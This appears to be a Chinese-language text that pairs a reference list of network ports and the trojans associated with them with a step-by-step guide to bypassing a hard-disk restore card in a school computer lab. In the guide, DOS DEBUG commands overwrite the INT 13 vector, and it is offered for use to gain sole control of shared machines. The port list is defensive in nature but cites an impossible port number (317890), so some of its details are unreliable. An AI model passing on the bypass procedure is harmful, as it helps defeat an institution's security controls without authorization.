它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配 端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分 配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”
查看,每个Web页需要一个新端口。
1080 SOCKS
这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的
通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简
单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发
生上述的错误配置。在加入IRC聊天室时常会看到这种情况。
1114 SQL
系统本身很少扫描这个端口,但常常是sscan脚本的一部分。
1243 Sub-7木马(TCP)
参见Subseven部分。
1524 ingreslock后门
许多攻击脚本将安装一个后门Shell于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd,
ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试
Telnet到你的机器上的这个端口,看看它是否会给你一个Shell。连接到600/pcserver也存在这个问题。
2049 NFS
NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS运行于 这个端口,Hacker/Cracker因而可以闭开portmapper直接测试这个端口。
3128 squid
这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看 到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户
(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。
5632 pcAnywere
你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能 得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。
一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。
6776 Sub-7 artifact
这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断
时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到
防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)
6970 RealAudio
RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。
13223 PowWow
PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。
它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中
“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四
个字节。
17027 Conducent
这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件
显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP
地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:机器会不断试图解析DNS名—ads.conducent.com,
即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使 用的Radiate是否也有这种现象)
27374 Sub-7木马(TCP)
参见Subseven部分。
30100 NetSphere木马(TCP)
通常这一端口的扫描是为了寻找中了NetSphere木马。
31337 Back Orifice “elite”
Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E, 1=L, 7=T)。因此许多后门程序运 行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,
其它的木马程序越来越流行。
31789 Hack-a-tack
这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote Access Trojan)。这种木马包含内置的31790
端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文 件传输连接)
32770~32900 RPC服务
Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使
低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了 寻找可被攻击的已知的RPC服务。
33434~33600 traceroute
如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute部分。
41508 Inoculan
早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此
硬盘还原卡的破解
所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET
描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,
当你AH=2的时,它便会call原始INT 13地址来完成*作.
只要找到原始INT 13入口便可以为所欲为.
不知看了这段感觉如何?慢慢消化吧.
主要矛盾:关键是要找到原始的int 13入口.
测试*作系统:win98
测试对象: 台湾远志还原卡
测试地点: 学校机房
测试目的: 控制还原卡,但不破坏.
注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:/debug,
- a100
- xor ax,ax
- int 13
- int3
; 寻找原始的int 13入口.
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.
-q
注: 填的时候要仔细,填错的话会死机。ok,破解完成.
这时在提示符c:/键入
c:/win
进入win98系统即可,那么这次你在win98系统中的一切*作,随着下一次
的启动都会被还原卡存储起来。
不过下一次进入系统的的时候,你还是需要重写地址0:4c,才可以让还原卡存储你的东东。
这时只需要在纯dos下进入debug,键入
-e 0:4c 95 9A 00 F0
-q 即可。
哈哈。。。这样也挺好,只有你才是这台computer的真正的主人 -。
别人还是受还原卡的限制的except--you 。